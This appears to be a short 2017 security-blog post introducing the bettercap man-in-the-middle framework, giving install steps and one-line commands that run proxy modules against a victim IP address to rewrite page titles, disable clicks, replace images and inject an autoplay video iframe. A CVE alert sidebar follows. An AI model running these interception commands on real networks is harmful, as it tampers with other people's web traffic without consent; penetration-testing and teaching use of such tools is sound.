Technique

Fun with bettercap: Change title, disable click, replace image and add video on victim browser

Do Son February 12, 2017 1 minute read

Screenshot from 2017-02-12 11-41-19

Introduce

bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack.

Installing

sudo apt-get install build-essential ruby-dev libpcap-dev

gem install bettercap

From source

git clone https://github.com/evilsocket/bettercap

cd bettercap

gem build bettercap.gemspec

sudo gem install bettercap*.gem

On Kali Linux

apt-get update

apt-get dist-upgrade

apt-get install bettercap

bettercap-proxy-modules

This repository contains some bettercap transparent proxy example modules.

Usage:

Add a “!!! HACKED !!!” string to very webpage title
```
bettercap -T 192.168.1.66 --proxy-module hack_title.rb
```

Disable click on victim machine

bettercap -T 192.168.1.66 --proxy-module noscroll.rb

Replace all images on webpage

bettercap -T 192.168.1.66 --proxy-module replace_images.rb

Inject an iframe with the (in)famous RickRoll video in autoplay mode.
```
bettercap -T 192.168.1.66 --proxy-module rickroll.rb
```

DEMO

https://www.youtube.com/watch?v=n1ylNKPIh5A

Tags: bettercap mitm sniffing spoofing

🚨

Receive alerts for vulnerabilities being exploited in the wild.

⚡

Get notified instantly when a Proof of Concept (PoC) exploit is published.

🔍

Access critical info on vulnerabilities even when marked as "RESERVED".

🧠

Insights powered by decades of expertise and global intelligence sources.

🎯

Customize alerts with up to 10 keywords for your specific tech stack.

📊

Export the raw CVE database for SIEM integration and reporting.

CVE-2026-48558CVSS 10.0
SimpleHelp versions 5.5.15 and prior and 6.0 pre-release versions contain an authentication bypass vulnerability in the OIDC authentication...
Admin intelCISA KEV📅 Added to KEV: Jun 29, 2026📅 Updated: Jun 29, 2026
CVE-2026-46817CVSS 9.8
Vulnerability in the Oracle Payments product of Oracle E-Business Suite (component: File Transmission). Supported versions that are affected...
Admin intel📅 Updated: Jun 29, 2026
CVE-2026-28496CVSS 9.4
FOSSBilling is a free, open-source billing and client management system. Versions prior to 0.8.0 have a Server-Side Template...
Admin intel📅 Updated: Jun 25, 2026
CVE-2026-12569
A critical remote code execution (RCE) vulnerability has been reported in PTC Windchill PDMlink and PTC FlexPLM. The...
CISA KEV📅 Added to KEV: Jun 25, 2026
CVE-2025-67038CVSS 9.8
An issue was discovered in Lantronix EDS5000 2.1.0.0R3. The HTTP RPC module executes a shell command to write...
CISA KEV📅 Added to KEV: Jun 23, 2026
CVE-2026-34908CVSS 10.0
A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi...
CISA KEV📅 Added to KEV: Jun 23, 2026
CVE-2026-34909CVSS 10.0
A malicious actor with access to the network could exploit a Path Traversal vulnerability found in UniFi OS...
CISA KEV📅 Added to KEV: Jun 23, 2026
CVE-2026-34910CVSS 10.0
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi...
CISA KEV📅 Added to KEV: Jun 23, 2026